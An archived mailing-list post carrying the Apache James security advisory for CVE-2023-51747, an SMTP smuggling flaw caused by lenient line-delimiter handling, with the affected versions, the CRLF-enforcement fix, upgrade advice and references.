[prev in list] [next in list] [prev in thread] [next in thread]
List: james-user
Subject: CVE-2023-51747: SMTP smuggling in Apache James
From: Benoit Tellier <btellier () apache ! org>
Date: 2024-02-27 12:28:33
Message-ID: 5180c151-2a7a-75c2-49e9-797342d8fe5a () apache ! org
[Download RAW message or body]
Severity: important
Affected versions:
- Apache James server through 3.7.4
- Apache James server 3.8 through 3.8.0
Description:
Apache James prior to versions 3.8.1 and 3.7.5 is vulnerable to SMTP smuggling.
A lenient behaviour in line delimiter handling might create a difference of \
interpretation between the sender and the receiver which can be exploited by an \
attacker to forge an SMTP envelop, allowing for instance to bypass SPF checks.
The patch implies enforcement of CRLF as a line delimiter as part of the DATA \
transaction.
We recommend James users to upgrade to non vulnerable versions.
Credit:
Benoit TELLIER (coordinator)
References:
https://sec-consult.com/blog/detail/smtp-smuggling-spoofing-e-mails-worldwide/
https://postfix.org/smtp-smuggling.html
https://james.apache.org/
https://www.cve.org/CVERecord?id=CVE-2023-51747
---------------------------------------------------------------------
To unsubscribe, e-mail: server-user-unsubscribe@james.apache.org
For additional commands, e-mail: server-user-help@james.apache.org
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic